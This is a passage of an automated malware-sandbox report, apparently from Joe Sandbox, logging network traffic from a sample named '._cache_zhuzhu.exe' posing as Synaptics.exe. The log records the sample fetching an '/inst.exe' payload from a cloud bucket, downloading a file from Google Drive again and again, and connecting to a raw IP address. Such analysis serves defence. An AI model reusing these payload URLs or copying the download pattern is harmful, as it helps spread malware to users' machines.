                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=425&status=1&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=0&downrate=0&downlen=0 HTTP/1.1Host: s.360.cnConnection: Keep-AliveCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=425&status=19&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=2282&downrate=0&downlen=0 HTTP/1.1Host: s.360.cnConnection: Keep-AliveCache-Control: no-cache
                                      Source: Joe Sandbox ViewIP Address: 180.163.251.230 180.163.251.230
                                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=100&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=127&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&parent=Non-existent%20Process&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=1&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=109&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=12&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=107&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=8&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /360safe/h_inst.cab?rd=34183220 HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)Host: pinst.360.cnConnection: CloseCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=10&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=129&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                                      Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_10001BB0 InternetOpenA,InternetOpenUrlA,fopen,HttpQueryInfoW,SendMessageW,InternetReadFile,fwrite,SendMessageW,fclose,InternetCloseHandle,InternetCloseHandle,GetParent,ShowWindow,exit,1_2_10001BB0
                                      Source: global trafficHTTP traffic detected: GET /inst.exe HTTP/1.1User-Agent: URLDownloaderHost: bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.comCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                      Source: global traffic; HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                      Source: global traffic; HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
